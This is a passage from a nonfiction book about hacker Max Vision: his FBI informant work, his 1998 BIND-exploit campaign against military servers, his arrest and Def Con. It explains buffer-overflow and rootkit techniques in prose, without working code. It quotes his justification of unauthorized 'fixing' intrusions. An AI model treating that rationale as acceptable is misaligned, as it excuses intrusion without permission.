computer +underground. Recreational hackers were no longer a target +for the bureau, he said. There was a new, more dangerous +breed of computer criminal emerging: “real” criminals. They +were cyberthieves, pedophiles, even terrorists. The FBI +was no longer chasing people like Max and his ilk. “We’re +not the enemy,” said Beeson. +Max wanted to help, and in March 1997 he was formally +inducted into the FBI’s Criminal Informant program. His first +written report for the bureau was an introductory course on +the virus-writing, warez, and computer-hacking scenes. His +follow-up report ten days later ran down compromised file- +transfer sites—like the one he’d exploited in Seattle—and +a music piracy gang called Rabid Neurosis that had +debuted the previous October with a bootlegged release of +Metallica’s Ride the Lightning. +When Max got his hands on a pirated version of +AutoCAD that was being circulated by a crew called +SWAT, the FBI rewarded him with a $200 payment. +Beeson had Max sign the receipt with the bureau’s code +name for its new asset: Equalizer. + +Max liked the FBI agent, and the feeling seemed to be +mutual. Neither of them knew that Chris Beeson would one +day put his Equalizer back behind bars and begin Max’s +transformation into one of the “real” criminals Beeson had +hoped to catch. + +4 + +The White Hat +ax was building his new life at a time of profound +change in the hacking world. +The first people to identify themselves as hackers were +software and electronics students at MIT in the 1960s. They +were smart kids who took an irreverent, antiauthoritarian +approach to the technology they would wind up pioneering +—a scruffy counterweight to the joyless suit and lab-jacket +culture then epitomized by the likes of IBM. Pranks were a +part of the hacker culture, and so was phone phreaking— +the usually illegal exploration of the forbidden back roads of +the telephone network. But hacking was above all a +creative effort, one that would lead to countless watershed +moments in computer history. +The word “hacker” took on darker connotations in the +early 1980s, when the first home computers—the +Commodore 64s, the TRS-80s, the Apples—came to +teenagers’ bedrooms in suburbs and cities around the +United States. The machines themselves were a product of +hacker culture; the Apple II, and with it the entire home +computer concept, was born of two Berkeley phone +phreaks named Steve Wozniak and Steve Jobs. But not all +teenagers were content with the machines, and in the +impatience of youth, they weren’t inclined to wait for grad +school to dip into real processing power or to explore the +global networks that could be reached with a phone call +and the squeal of a modem. So they began illicit forays into +corporate, government, and academic systems and took +their first tentative steps into the ARPANET, the Internet’s +forerunner. + +When those first young intruders began getting busted in +1983, the national press cast about for a word to describe +them and settled on the one the kids had given themselves: +“hackers.” Like the previous generation of hackers, they +were pushing the limits of technology, outwitting the +establishment, and doing things that were supposed to be +impossible. But for them, that involved breaching corporate +computers, taking over telephone switches, and slipping +into government systems, universities, and defense +contractor networks. The older generation winced at the +comparison, but from that point on, the word “hacker” would +have two meanings: a talented programmer who pulled +himself up by his own bootstraps, and a recreational +computer intruder. Adding to the confusion, many hackers +were both. +Now, in the mid-1990s, the hacking community was +dividing again. The FBI and the Secret Service had staged +arrests of high-profile intruders like Kevin Mitnick and Mark +“Phiber Optik” Abene, a New York phone phreak, and the +prospect of prison stigmatized recreational intrusion while +raising the risk far beyond the rewards of ego and +adventure. The impetus for cracking computers was fading +as well: The Internet was open to anyone now, and personal +computers had grown powerful enough to run the same +operating systems and programming languages that fueled +the big machines denied to amateurs. Most of all, there +was real money to be made defending computers and +none attacking them. +Cracking systems was becoming uncool. Those +possessed of a hacker’s mind-set were increasingly +rejecting intrusion and going right into legitimate security +work. And the intruders started hanging up their black hats +to join them. They became the “white-hat hackers”— +referencing the square-jawed heroes in old cowboy films— +applying their computer skills on the side of truth and +justice. +Max thought of himself as one of the white hats. Watching + +Max thought of himself as one of the white hats. Watching +for new types of attacks and emerging vulnerabilities was +now in his job description, and as Max Vision, he was +beginning to contribute to some of the computer-security +mailing lists where the latest developments were +discussed. But he couldn’t completely exorcise Ghost23 +from his personality. It was an open secret among Max’s +friends that he was still cracking systems. When he saw +something novel or interesting, he saw no harm in trying it +out for himself. +Tim was at work one day when he got a call from a +flummoxed system administrator at another company who’d +traced an intrusion back to Hungry.com—the online home +of the Hungry Programmers, where they hosted their +projects, hung their résumés, and maintained e-mail +addresses that would remain steady through job changes +and other upheavals. There were dozens of geeks on the +shared system, but Tim knew at once who was responsible. +He put the sysadmin on hold and phoned up Max. +“Stop. Hacking. Now,” he said. +Max stammered out an apology—it was the burning lawn +all over again. Tim switched back to the other line, where +the system administrator happily reported that the attack +had stopped in its tracks. +The complaint surprised and confused Max—if his +targets knew what a good guy he was, they wouldn’t take +issue with some harmless intrusions. “Max, you gotta get +permission,” Tim explained. He offered some life advice. +“Look, just sort of imagine that everyone’s looking at you. +That’s a good way to ensure that what you’re doing is +correct. If I was standing there, or your dad was standing +there, would you still feel the same about doing it? What +would we say?” +If there was one thing Max was missing in his new life, it +was a partner to share it with. He met twenty-year-old Kimi +Winters at a rave called Warmth, held on an empty + +warehouse floor in the city—Max had become a fixture in +the rave scene, dancing with a surprising, fluid grace, +whirling his arms like a Brazilian flame dancer. Kimi was a +community college student and part-time barista. A foot +shorter than Max, she sported an androgynous appearance +in the shapeless black hoodie she liked to wear when she +went out. But on a second look, she was decidedly cute, +with apple cheeks and her Korean mother’s copper-tinted +skin. Max invited Kimi to a party at his place. +The parties at Hungry Manor were legendary, and when +Kimi arrived the living room was already packed with +dozens of party guests from Silicon Valley’s keyboard class +—programmers, system administrators, and Web +designers—mingling under the glass chandelier. Max lit up +when he spotted her. He led her on a tour of the house, +pointing out the geeky accoutrements the Hungry +Programmers had added. +The tour ended in Max’s bedroom in Hungry Manor’s +east wing. For all of the grandeur of the house, Max’s room +had the charm of a monk’s cell—no furniture but a futon on +the floor, no comforts except a computer. For the party, Max +had trained blue and red spotlights on a bottle of +peppermint schnapps—his only vice. Kimi returned for +dinner the next night, and there was a single item on his +vegetarian menu: raw cookie dough. Max shaved the +sugary sludge off in slices and served it to his date with the +schnapps. Why, after all, would anyone not eat raw cookie +dough for dinner, given the option? +Kimi was intrigued. Max needed so little to be happy. He +was like a child. When his birthday came soon after the +party, she sent a decorated box of balloons to his office at +MPath, and Max was moved nearly to tears by the gesture. +She was his “dream girl,” he told her later. They began to +talk about committing to a life together. +In September, Hungry Manor’s landlord, unhappy with the +programmers’ upkeep of the estate, reclaimed the house, + +and after a final bash to bid farewell to their communal +mansion, the Hungries scattered to rentals throughout the +Bay Area. Max and Kimi landed in their own place in +Mountain View, a cramped studio in a barracks-like +apartment complex alongside the 101 freeway, Silicon +Valley’s congested main artery. +Max resumed his work for the FBI, and his haunting of +IRC led him to a new opportunity—his chance to break out +as a white-hat hacker. He’d made a friend in the chat +rooms who was starting a real consulting business in San +Francisco and was interested in bringing Max on board. +Max went up to the city to visit Matt Harrigan, aka, “Digital +Jesus.” +Harrigan, just twenty-two, was one of four white hats who’d +been profiled in a Forbes cover story the previous year, +and he’d cannily used his fifteen minutes of fame to win +some seed money for a business: a professional hacking +shop in San Francisco’s financial district. +The idea was simple: Corporations would pay his +company, Microcosm Computer Resources, to put their +networks through a real hack attack, culminating in a +detailed report on the client’s security strengths and +weaknesses. The business of “penetration testing”—as it +was called—had been dominated by the Big Five +accounting firms, but Harrigan was already signing up +clients by admitting something that no accounting firm +would ever announce: that his experience came from real- +life hacking, and he was freely hiring other ex-hackers. +MCR would be billing out between $300 and $400 an +hour, Harrigan explained. Max would work as a +subcontractor, making $100 to $150. All for doing two of +the things he liked most in the world: hacking into shit and +writing reports. +Max had found his niche. It turned out his single- +mindedness made him a natural at penetration testing: He + +was immune to frustration, hammering at a client’s network +for hours, moving from one attack vector to another until he +found a way in. +With Max making real money at MCR, Kimi quit her job +as a barista and found more rewarding work teaching +autistic students. The couple moved from the cramped +apartment in Mountain View to a duplex in San Jose. In +March, they got married in a church on a college campus in +Lakewood, Washington, where Kimi’s family lived. +Tim Spencer and most of the Hungry Programmers went +up to Washington to see their problem child married off. +Max’s parents, his sister, Kimi’s family, and scores of +friends and extended family showed up for the ceremony. +Max wore a tuxedo and a broad grin, and Kimi glowed in +her white wedding dress and veil. Surrounded by family and +beloved friends, they were a picture-perfect young couple +beginning a life together. +They posed outside: Kimi’s father, a military man, stood +proudly in his dress uniform, her mother in a traditional +Korean hanbok. Flanked by his own parents, Max beamed +at the camera, while storm clouds gathered overhead in the +Pacific Northwest sky. +It was three years almost to the day since Max walked +out of prison, and he had everything now—a devoted wife, +a promising career as a white-hat hacker, a nice home. In +just a few weeks, he’d throw it all away. + +5 + +Cyberwar! +ack home in San Francisco, a temptation was waiting +for Max, written in computer code. +bcopy (fname, anbuf, alen = (char *)*cpp - fname); +It was one line of nine thousand comprising the Berkeley +Internet Name Domain, an ancient girder in the Internet’s +infrastructure, as important as any router or fiber-optic +cable. Developed in the early 1980s with a grant from the +Pentagon’s Defense Advanced Research Projects Agency +(DARPA), BIND implemented the scalable Domain Name +System, a kind of distributed telephone directory that +translates strings like Yahoo.com, which humans +understand, into the numeric addresses the network +comprehends. Without BIND, or one of the competing +programs that followed, we’d be getting our online news +from 157.166.226.25 instead of CNN.com and visiting +74.125.67.100 to perform a Google search. +BIND was one of the innovations that made the explosive +growth of the Internet possible—it replaced a crude +mechanism that couldn’t have expanded with the Net. But in +the 1990s, it was also one of the legacy programs that +were shaping up as the modern Internet’s biggest security +problem. The code was a product of a simpler time, when +the network was cloistered and threats were few. Now +hackers were plumbing its depths and coming back with a +seemingly endless supply of security holes. +A high priesthood of network experts called the Internet +Software Consortium appointed themselves keepers of the + +code and had begun furiously rewriting it. But in the +meantime, the most modern, sophisticated networks in the +world, with sparkling new servers and workstations, were +running a buggy computer program from another age. +In 1998, security experts discovered the latest flaw in the +code. It boiled down to that single line. It accepted an +inquiry from the Internet, as it should, and copied it byte for +byte into the temporary buffer “anbuf” in the server’s +memory. But it didn’t properly check the size of the +incoming data. Consequently, a hacker could transmit a +deliberately overlong query to a BIND server, overflow the +buffer, and spill data into the rest of the computer’s memory +like oil from the Exxon Valdez. +Performed haphazardly, such an attack would cause the +program to crash. But a careful hacker could do much +worse. He could load the buffer with his own small snippet +of executable computer code, then he could keep going, +tripping cautiously all the way to the top of the program’s +memory space, where a special short-term storage area +called the “stack” resides. +The stack is where the computer’s processor keeps +track of what it’s doing—every time a program diverts the +computer off to a subroutine, the processor pushes its +current memory address onto the stack, like a bookmark, +so it knows where to return to when it’s done. +Once a hacker is in the stack, he can overwrite the last +return address with the location of his own malicious +payload. When the computer is done with the current +subroutine, it returns not to where it began, but to the +hacker’s instruction—and because BIND runs under the all- +powerful administrative “root” account, the attacker’s code +does as well. The computer is now under the hacker’s +control. +Two weeks after Max and Kimi’s wedding, the +government-funded Computer Emergency Response Team +at Carnegie Mellon University—which runs a kind of + +Emergency Broadcast System for security holes—issued +an alert about the BIND flaw, along with a link to the simple +fix: two additional lines of computer code that rejected +overlong queries. But CERT packaged its alert with two +other BIND vulnerabilities that were of little consequence +and understated the importance of the hole. Consequently, +not everyone appreciated the gravity of the situation. +Max understood perfectly. +He read the CERT advisory with amazement. BIND +came installed standard with Linux, and it ran on servers on +corporate, ISP, nonprofit, educational, and military +networks. It was everywhere. And so was the defective line +of code. The only thing holding back a feeding frenzy of +attacks was that nobody had written a program to exploit +the security hole. But that was just a matter of time. +Sure enough, on May 18, an exploit program showed up +on Rootshell.com, a computer security news site run by +hobbyists. Max picked up the phone and called his FBI +contact, Chris Beeson, at home. The situation was serious, +he explained. Anybody who hadn’t installed the BIND patch +could now be hacked by any script kiddy capable of +downloading a program and typing a command. +If history was a guide, government computers would be +particularly vulnerable. Just a month earlier, a less serious +bug in the Sun Solaris operating system had led to a +hacker cracking computers at a dozen U.S. military bases, +in what a deputy defense secretary called “the most +organized and systematic attack to date” on American +defense systems. Those attacks had set off a full-blown +cyberwarfare false alarm: The Pentagon gave the intrusions +the code name “Solar Sunrise” and considered Saddam +Hussein the prime suspect until investigators traced the +attacks to a young Israeli hacker who was just playing +around. +Max called Beeson again the next day, when a hacker +group named ADM released a weaponized version of the +BIND exploit designed to scan the Internet at random + +BIND exploit designed to scan the Internet at random +looking for unpatched servers, then break in, install itself, +and use the newly compromised computer as a platform for +still more scans and break-ins. It was a certainty now that +someone was going to own the entire Internet. It was just a +question of who. +He hung up and pondered. Someone was going to do it. +… +He shared his plans with his new wife in boyish, excited +tones. Max would author his own BIND attack. His version +would close the hole everywhere it found it, like releasing +sterile fruit flies to tamp down an infestation. He would limit +his attack to the targets most in need of an emergency +security upgrade: U.S. military and civilian government +sites. +“Don’t get caught,” said Kimi, who’d learned not to argue +with Max when he was like this, his mind hostage to an +idea. +Max was struggling with the binary nature of his +personality: the professional married man with a stake in +the world around him, and the impulsive child tempted by +every call to mischief. The child won. He sat at his keyboard +and plunged into furious programming. +His code would operate in three rapid-fire stages. It +would begin by flinging a virtual grappling hook through the +BIND hole, executing commands that forced the machine to +reach out over the Internet and import a 230-byte script. +That script, in turn, would connect it to a different host +infiltrated by Max, where it would download a hefty package +of evil called a “rootkit.” +A rootkit is a bundle of standard system programs that +have been corrupted to secretly serve the hacker: A new +login program operates just like the real thing but now +includes a back door through which the intruder can reenter +the machine. The “passwd” program still lets users change +their passwords but also quietly records and stores the new + +password where it can be retrieved later. The new list +program lists the contents of a directory, as it should, but +takes care to conceal any files that are part of the rootkit. +Once the rootkit was in place, Max’s code would +accomplish what the government failed to do: It would +upgrade the hacked computer to the latest version of BIND, +closing the security hole through which it had entered. The +computer would now be safe from any future attacks, but +Max, the benevolent meddler, would still be able to reenter +the system at will. Max was at once fixing the problem and +exploiting it; he was a black hat and a white hat at the same +time. +The whole attack would take just a couple of minutes +each time. One moment, the computer would be controlled +by the system administrators; then, grappling hook, +download script, rootkit, and it was in Max’s pocket. +Max was still programming when the FBI got back to him +and asked for a full report on the BIND hole. But the feds +had had their chance; Max’s code would speak for him +now. He took a moment to crack a couple of college +machines to use as a staging ground, then, on May 21, a +Tuesday, he dialed the Internet through a stolen Verio +account … and launched. +The results were instant and highly satisfying. Max’s +grappling-hook code was designed to signal its success to +his computer over the Verio dial-up, so he could watch the +attack spread. Hacked machines around the country +reported back to him, an Xterm window popping up on his +screen for each one. Brooks Air Force Base—now +property of Max Vision. Mc-Chord, Tinker, Offutt, Scott, +Maxwell, Kirtland, Keesler, Robins. His code wormed into +Air Force servers, Army computers, a machine in the office +of a cabinet secretary. Each machine now had a back door +that Max could use any time he wanted. +Max was notching up military conquests like points in a + +video game. When his code swept into the Navy’s Internet +space, it found so many unpatched BIND servers that the +stream of pop-ups turned into a torrent. His own computer +struggled under the strain, then crashed. +After some fine-tuning, he relaunched. For five days he +was absorbed in his growing dominion over cyberspace. +He ignored e-mail from the FBI, who still wanted that report. +“Where’s the stuff?” Agent Beeson wrote. “Please call.” +There had to be more he could do with the power to +crack almost any network he wanted. Max trained his BIND +exploit on the servers of Id Software in Mesquite, Texas, a +gaming company developing a third installment of the +enormously popular first-person shooter Quake. Max loved +first-person shooters. He was on the network in a flash, and +after some exploring, he emerged with his trophy. He +announced to Kimi that he’d just obtained the source code +—the virtual blueprints—for Quake III, the most anticipated +game of the year. +Kimi was unmoved. “Can you put it back?” +Max soon realized that his attacks were getting some +attention. At Lawrence Berkeley National Laboratory, a +researcher named Vern Paxson spotted Max’s scanning +using a new system he’d developed called BRO, for Big +Brother. BRO was an experiment in a relatively new kind of +security countermeasure called an intrusion detection +system—a cyber burglar alarm with the sole function of +sitting quietly on a network and sifting through all the traffic +for suspicious activity, alerting administrators when it spots +something that doesn’t look right. +Paxson wrote a full report on the attack for CERT. Max +intercepted it and was impressed. The researcher had not +only detected his attack, he’d compiled a list of servers that +Max’s code was attacking through Lawrence Berkeley’s +network—Max was using the network as one of his +secondary launch points. He sent Paxson an anonymous +note from the lab’s root account. + +Vern, +I’m sorry to have caused you any inconvenience, but I +single-handed fixed a MAJOR GAPING SECURITY +HOLE in many of your systems. I admit there were new +holes but these were all passworded, and I would +never cause damage to someone’s computer system. +If I didn’t hit these, someone else would have, and +they would have been dirty. These kids leave warez +and IRC BS laying everywhere, and /bin/rm systems +when they are unhappy. Lame. +You might not appreciate what I was doing, but it +was for the greater good. I am abandoning all hosts on +that list that you captured.… I am not touching those +systems since I know you turned them over to CERT. +CERT should hire people with my skill. Of course, if +paid I would never leave rootkits or such. +Pretty clever though? Heh. It was a blast. Owning +hundreds, nay thousands of systems, and knowing that +you were FIXING them on the way … +Uhm, I’m not ever doing this sort of shit again. You +have my tools now. That pisses me off … +Hrm. Anyway I just don’t want this to happen again, +so I’m going to let it lie … +“The Cracker” +With that, Max shut down his five-day attack on the +government, with more cracked systems behind him than +he could count. He was satisfied that he’d made the Internet +safer than it was before; thousands of computers that had +been vulnerable to every hacker in the world were now +vulnerable to only one: Max Vision. +Max immediately jumped into a new, more socially +acceptable project: He would write a Web application that +would let anyone on the Internet request an automatic real- +time scan of their network to assess whether or not they +were open to the BIND attack. He also conceived a benign + +variant of the siege he’d just concluded. Like before, he +would scan government and military networks. But instead +of cracking the vulnerable computers, he’d automatically +send an e-mail warning to the administrators. There’d be +no need to hide behind a hacked dial-up account this time. +Both services would live on his brand-new public website: +Whitehats.com. +After two days and nights of work, he was knee-deep in +his new, legal hacking project when Beeson e-mailed +again. “What happened? Thought you’d send me e-mail.” +Max could hardly explain to his FBI friend that he’d been +busy staging one of the largest government computer +breaches in history. So he emphasized his new project +instead. “I am almost finished creating a public service +vulnerability scanner and patch site—but there are some +parts that aren’t ready for release,” he wrote back. +“Oh, and here is the ADM worm program,” he added. “I +don’t think it will spread very far.” + +6 + +I Miss Crime +n the afternoon of June 2, Max opened the door of his +San Jose duplex to greet Chris Beeson and registered +instantly that he was in trouble: There were three other suits +with the FBI agent, including Beeson’s surly boss, Pete +Trahon, head of the computer crime squad. +The month after the BIND attack had been a busy time +for Max. He launched Whitehats.com, and it was an instant +success in the security world. In addition to housing his +scanning tool, the site collected the latest CERT advisories +and links to BIND software patches, as well as a paper Max +had written dissecting the ADM worm with the clarity and +the discerning eye of a connoisseur. Nobody in the +community suspected that Max Vision, the rising star +behind Whitehats.com, had personally provided the +brightest example of the seriousness of the BIND security +hole. +He was also continuing to file reports to the FBI. After his +last one, Beeson began e-mailing to arrange a casual +meeting, supposedly to go over Max’s latest findings. “How +’bout if we just meet at your place?” Beeson wrote. “I know I +have the address somewhere around here.” +Now that he was on Max’s doorstep, Beeson explained +why they were really there. He knew all about Max’s attack +on the Pentagon. One of the men with him, a young +Washington, DC–based Air Force investigator named Eric +Smith, had traced the BIND intrusions to Max’s house. +Beeson had a search warrant. +Max let them in, already apologizing. He only meant to +help, he explained. + +They chatted amicably. Max, happy for an audience, +grew expansive, describing the twists and turns of his +attack and listening with interest as Smith described how +he’d tracked Max through the pop-up messages Max had +used to alert himself when a system was subverted: The +messages went to a Verio dial-up, and a subpoena to the +ISP produced Max’s phone number. It hadn’t been difficult. +Max had convinced himself he was doing something +positive for the Internet, so he hadn’t done much to cover +his tracks. +The feds asked if anyone had known what Max was up +to, and he said his boss was involved. Matt Harrigan— +Digital Jesus—had not completely given up hacking +himself, Max said, adding that Harrigan’s company was +about to get a contract with the National Security Agency.* +At the agents’ behest, Max wrote out a confession. “My +motives were purely for research and ‘to see if it could be +done,’ ” Max wrote. “I know this is no excuse, and believe +me, I am sorry for it, but it’s the truth.” +Kimi came home from school to find the feds still tossing +the house. Like grazing deer, they looked up in unison as +she entered, dismissed her as unthreatening, and turned +wordlessly back to their work. When they left, they hauled +Max’s computer equipment with them. +The door closed, leaving the newlyweds alone in what +was left of their home. An apology formed on Max’s lips. +Kimi cut him off angrily. +“I told you not to get caught!” +The FBI agents saw an opportunity in Max’s crime. Trahon +and Beeson returned to Max’s home and gave their former +ally the score. If Max hoped for leniency, he’d have to work +for them—and writing reports wasn’t going to cut it +anymore. +Eager to make amends and determined to salvage his +life and career, Max didn’t ask for anything in writing. He + +took it on faith that if he helped the FBI agents, they would +help him. +Two weeks later, Max got his first assignment. A gang of +phone phreaks had just hijacked the phone system at the +networking company 3Com and were using it as their own +private teleconferencing facility. Beeson and Trahon could +dial into the illicit chat line, but they doubted their ability to +blend in with the hackers and gain any useful intelligence. +Max studied up on the latest phone phreaking methods, +then dialed into the system from the FBI’s field office while +the bureau recorded the call. +Dropping the names of hackers he knew and drawing on +his own expertise, Max easily persuaded the phone +phreaks that he was one of them. They opened up and +revealed that they were an international gang of about thirty- +five phone hackers called DarkCYDE, living mostly in +Britain and Ireland. DarkCYDE aspired to “unite Phreakers +and Hackers all over the world into one big digital army,” +according to the group’s blustery manifesto. But at root they +were just kids playing with the phone, just as Max had done +in high school. After the call, Beeson asked Max to stay +close to the gang. Max chatted them up on IRC and turned +over the logs to his handlers. +Pleased with Max’s work, the agents summoned him to +the federal building in San Francisco a week later to brief +him on a new assignment. This time, he’d be going to +Vegas. +Max’s eyes moved over the nest of linen-clad card tables in +the gaudy exhibit hall of the Plaza Hotel and Casino. +Dozens of young men in T-shirts and shorts or jeans—the +hacker’s uniform—were at the tables hunkered over a bank +of computer workstations or standing on the sidelines, +occasionally pointing at something on a screen. +To the untrained eye, it was a strange way to spend a +weekend in Sin City—banging on keyboards like some + +anonymous cubical drone, far from the pool, the slots, and +the shows. But the hackers were in pitched competition, +working in teams to penetrate a clutch of computers +hanging off a hastily erected network. The first team to +leave their virtual marker in one of the targets would claim a +$250 prize and valuable bragging rights—with points also +awarded for hacking other competitors. New attacks and +ruses were flowing from the hackers’ fingers, and secret, +stockpiled exploits were being pulled from virtual armories +to be used in public for the first time. +At Def Con, the world’s largest hacking convention, the +Capture the Flag competition was Fischer vs. Spassky +every year. +Kimi wasn’t impressed, but Max was in heaven. Across +the floor, more tables were cluttered with vintage computer +gear, odd electronics, lock-picking tools, T-shirts, books, +and copies of 2600: The Hacker Quarterly. Max spotted +Elias Levy, a famous white-hat hacker, and pointed him out +to Kimi. Levy, aka Aleph One, was the moderator of the +Bugtraq mailing list—the New York Times of computer +security—and the author of a seminal tutorial on buffer +overflows called “Smashing the Stack for Fun and Profit” +that had appeared in Phrack. Max didn’t dare approach the +luminary. What would he say? +Max wasn’t the only law enforcement mole at Def Con, of +course. From its humble beginnings in 1992 as a one-off +conference pulled together by a former phone phreak, Def +Con had grown into a legendary gathering that drew nearly +two thousand hackers, computer security professionals, +and hangers-on from around the world. They came to party +in person with comrades they’d befriended online, present +and attend technical talks, buy and sell merchandise, and +get very, very drunk in all-night bashes in the hotel rooms. +Def Con was such an obviously target-rich environment +for the government that the organizer, Jeff “the Dark +Tangent” Moss, had invented a new convention game + +called Spot the Fed. A hacker who thought he’d identified a +G-man in the crowd could point him out, make a case, and, +if the audience concurred, take home a coveted I SPOTTED +THE FED AT DEF CON T-shirt. Often the suspected fed would +just give up and good-naturedly whip out a badge, giving +the hacker an easy win. +Max’s mission was broad. Trahon and Beeson wanted +him to chum up to his fellow hackers and try to get their real +names, then lure them into exchanging public PGP +encryption keys, which security-minded geeks use like +sealing wax to encrypt and sign their e-mail. Max’s heart +just wasn’t in it. Writing reports for the bureau was one +thing, and he’d had no qualms about getting the goods on +the DarkCYDE phreaks, who were too young to get in real +trouble. But this assignment smelled like snitching. +Personal loyalty was written deep into Max’s firmware, and +one look at the Def Con crowd told him these were his +people. +Many of the hackers were reluctantly giving up childish +things, migrating into legitimate dot-com jobs or starting +security companies. They were becoming white hats, like +Max. A popular T-shirt at the conference summed up the +mood: I MISS CRIME. +Max shrugged off the FBI’s edict and began attending +the parties and the talks. On the roster this year was a +much-anticipated software release by the Cult of the Dead +Cow. The cDc were the rock stars of the hacker world— +literally: They recorded and performed music and infused +their conference presentations with over-the-top theatrics +that made them media darlings. At this Def Con the group +was unleashing Back Orifice, a sophisticated remote- +control program for Windows machines. If you could trick +someone into running Back Orifice, you could access their +files, see what was on their screen, and even look through +their webcam. It was designed to embarrass Microsoft for +the shoddy security in Windows 98. +The crowd at the Back Orifice presentation was ecstatic, + +The crowd at the Back Orifice presentation was ecstatic, +and Max found the energy infectious. But of more +pragmatic interest to Max was a talk on the legalities of +computer hacking by a San Francisco criminal defense +attorney named Jennifer Granick. Granick opened her +presentation by describing the recent landmark prosecution +of a Bay Area hacker named Carlos Salgado Jr., a thirty- +six-year-old computer repairman who, more than any other +hacker, represented the future of computer crime. +From his room in his parents’ house in Daly City, a few +miles south of San Francisco, Salgado had cracked a +major technology company and stolen a database of eighty +thousand credit card numbers, with names, ZIP codes, and +expiration dates. Credit card numbers had been hacked +before, but what Salgado did next assured him a place in +the cybercrime history books. Using the handle “Smak,” he +jumped into the #carding chat room on IRC and put the +entire list up for sale. +It was like offering a 747 for sale at a flea market. At the +time, the online credit card fraud underground was a +depressing bog of kids and small timers who’d barely +advanced beyond the previous generation of fraudsters +fishing receipt carbons from the Dumpsters behind the +mall. Their typical deals were in the single digits, and their +advice to one another was tainted by myth and idiocy. Much +of the conversation unfolded in an open channel where +anyone in law enforcement could log in and watch—the +carders’ only security was the fact that nobody would +bother. +Remarkably, Salgado found a prospective buyer in +#carding—a San Diego computer science student who’d +been putting himself through college by counterfeiting credit +cards, getting the account numbers from billing statements +pilfered from the U.S. mail. The student had mob contacts +who, he believed, would buy Smak’s entire stolen database +for six figures. +The deal went south when Salgado, looking to perform a + +little due diligence, hacked his customer’s ISP and poked +through his files. When the student found out, he got mad +and secretly began working with the FBI. On the morning of +May 21, 1997, Salgado showed up at a meeting with his +buyer at the smoking lounge at San Francisco International +Airport, where he expected to trade a CD-ROM containing +the database for a suitcase packed with $260,000 in cash. +Instead, he was arrested by the San Francisco computer +crime squad. +The foiled plot was an eye-opener for the FBI: Salgado +represented the first of a new breed of profit-oriented +hacker, and he posed a threat to the future of e-commerce. +Surveys showed that Web users were anxious about +sending credit card numbers into the electronic ether—it +was the number one thing holding them back from Internet +purchasing. Now, after years of struggling to gain +consumers’ trust and reward the faith of investors, e- +commerce companies were starting to win over Wall +Street. Less than two weeks before Salgado’s arrest, +Amazon.com had launched its long-awaited initial public +offering and ended the day $54 million richer. +Salgado’s IPO was higher: The credit card companies +determined the total spending limits on his eighty thousand +cards amounted to over a billion dollars—$931,568,535 if +you subtracted the legitimate owners’ outstanding +balances. The only thing he’d been missing was a +NASDAQ to trade on. Once the underground figured out +that part of the equation, it would be an industry of its own. +As soon as Salgado was arrested, he’d confessed +everything to the FBI. That, Granick told the Def Con +hackers in her presentation, was his big mistake. Despite +his cooperation, Salgado had been sentenced to thirty +months in prison earlier that year. +“Now, the FBI wanted me to tell you that it was good for +Mr. Salgado that he talked.” Granick paused. “That’s + +bullshit. +“Just say no!” she said, and cheers and whistles swelled +from the audience. “There’s never any good reason to talk +to a cop.… If you’re going to cooperate, you’re going to +cooperate after consulting with a lawyer and cutting a deal. +There’s never any reason to give them information for free.” +In the back of the room, Kimi prodded Max in the ribs +with her elbow. Everything Granick was advising computer +intruders not to do, Max had done. Everything. +Max was having second thoughts about his arrangement +with the feds. +• • • +“We need to make some changes in the way we do +business.” +Max could feel the frustration radiating from his screen as +he read the latest note from Chris Beeson. Max had +returned from Def Con empty-handed and then blown off a +meeting at the federal building at which he was supposed +to get a new assignment, pissing off Beeson’s supervisor, +Pete Trahon. Continuing his e-mail, Beeson warned Max of +dark consequences for continued flakiness. “In the future, +missed appointments without exceptional reasons will be +considered uncooperative on your part. If you are not willing +to cooperate then we HAVE to take the appropriate +actions. Pete is meeting with the prosecutor on YOUR case +Monday. He wants to meet with you promptly in our office at +10:00am sharp, MONDAY 8/17/98. I am not available next +week (that is why I wanted to meet with you this week) so +you’re going to have to deal directly with Pete.” +This time, Max showed up. Trahon explained that he’d +become interested in Max’s boss at MCR, Matt Harrigan. +The agent was alarmed at the idea of a hacker running a +cybersecurity shop staffed with other hackers, like Max, and +vying for a contract with the NSA. If Max wanted to make +the FBI happy, he had to get Harrigan to admit he was still + +hacking and had played a role in Max’s BIND attack. +The agent gave Max a new form to sign. It was Max’s +written consent to wire him for sound. Trahon handed him a +bureau-issued recording device disguised as a pager. +On the way home, Max pondered the situation. Harrigan +was a friend and fellow hacker. Now the FBI was asking +Max to perform the ultimate betrayal—to become Digital +Jesus’s real-life Judas. +The next day, Max met Harrigan at a Denny’s diner in +San Jose, without the FBI wire. His eyes scanned over the +other diners and looked out the window into the parking lot. +There could be feds anywhere. +He pulled out a piece of paper and slipped it across the +booth. “Here’s what’s going on.…” +Max phoned Jennifer Granick after the meeting—he’d +gotten her card at the conclusion of her Def Con talk—and +she agreed to represent him. +When they learned Max had lawyered up, Beeson and +Trahon wasted no time in officially dropping him as an +informant. Granick began phoning the FBI and the +prosecutor’s office to find out what the government had +planned for her new client. Three months later she finally got +an answer from the government’s top cybercrime +prosecutor in Silicon Valley. The United States was no +longer interested in Max’s cooperation. He could look +forward to going back to prison. +* Harrigan’s involvement is in dispute. Max says he planned +the BIND attack with Harrigan at the MCR office and that +Harrigan wrote the program that built the target list of +government computers. Harrigan says he was not involved +but was aware of what Max was up to. + +7 + +Max Vision +ith his government service at an end, Max went to +work building his reputation as a white-hat hacker, even as +he lived under the sword of Damocles of a pending federal +indictment. +The BIND vulnerability and the resultant success of +Whitehats.com had given him a running start. Now Max +hung up his own shingle as a computer security consultant, +erecting a new website touting his services as a hacker for +hire at one hundred dollars an hour—or free to nonprofit +groups. His chief selling point: a 100 percent success rate +in penetration tests. He had never once confronted a +network he couldn’t crack. +It was an exciting time to be a white hat. The rebellious +spirit that drove the open-source software movement was +planting itself in the computer security world, and a new +crop of college graduates, dropouts, and former and +current black hats was upending the conservative +assumptions that had dominated security thinking for +decades. +First to be dustbinned was the tenet that security holes +and attack methods should be kept quiet, held privately +among a cadre of trusted responsible adults. The white +hats called this notion “security through obscurity.” The new +generation preferred “full disclosure.” Discussing security +problems widely not only helped get them fixed, but it also +advanced the science of security, and hacking, as a whole. +Keeping bugs private only benefited two groups: the bad +guys who were exploiting them, and vendors like Microsoft +that preferred to fix security holes without confessing the + +details of their screwups. +The full-disclosure movement spawned the Bugtraq +mailing list, where hackers of any hat color were +encouraged to send in detailed reports of security flaws +they’d found in software. If they could provide an “exploit”— +code that demonstrated the flaw—so much the better. The +preferred path to full disclosure was to first notify the +software maker and give that company time to issue a +patch before releasing the flaw or exploit on 